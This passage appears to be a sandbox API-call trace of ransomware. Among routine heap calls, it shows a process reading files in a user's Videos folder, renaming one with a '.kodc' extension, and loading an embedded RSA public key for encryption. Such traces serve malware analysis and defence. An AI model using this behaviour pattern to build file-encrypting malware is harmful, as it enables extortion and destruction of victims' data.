RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c50 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7c38 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c50 | out: hHeap=0x630000) returned 1 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c38 | out: hHeap=0x630000) returned 1 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.256] GetCurrentThreadId () returned 0x42c [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba68a8 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.257] GetCurrentThreadId () returned 0x42c [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c38 [0100.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c50 [0100.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c20 [0100.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c68 [0100.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c38 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c38 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c38 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c68 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c50 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c20 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c08 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c4f0 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.261] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0xdd7e, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xdd7e, lpOverlapped=0x0) returned 1 [0100.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0100.261] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdd83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.261] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.262] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.262] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.262] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.262] CloseHandle (hObject=0x5cc) returned 1 [0100.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0100.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.263] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\k7XpB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k7xpb.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\k7XpB.mkv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k7xpb.mkv.kodc")) returned 1 [0100.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.264] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.265] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd9bcde0, ftCreationTime.dwHighDateTime=0x1d5bab1, ftLastAccessTime.dwLowDateTime=0x3bc55400, ftLastAccessTime.dwHighDateTime=0x1d5c12b, ftLastWriteTime.dwLowDateTime=0x3bc55400, ftLastWriteTime.dwHighDateTime=0x1d5c12b, nFileSizeHigh=0x0, nFileSizeLow=0x3983, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lBUQXS.mp4", cAlternateFileName="")) returned 1 [0100.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.265] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lBUQXS.mp4") returned=".mp4" [0100.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lBUQXS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lbuqxs.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.266] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=14723) returned 1 [0100.266] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.269] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x395d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.269] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.272] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.272] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x3983, lpOverlapped=0x0) returned 1 [0100.272] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.272] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.272] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.272] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.273] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.273] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.273] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.273] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.273] GetLastError () returned 0x0 [0100.273] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.273] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.273] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.273] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.273] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3980) returned 0x9ba6d90 [0100.274] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c4f0 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c08 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c538 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c20 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c50 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.274] RtlAllocateHeap 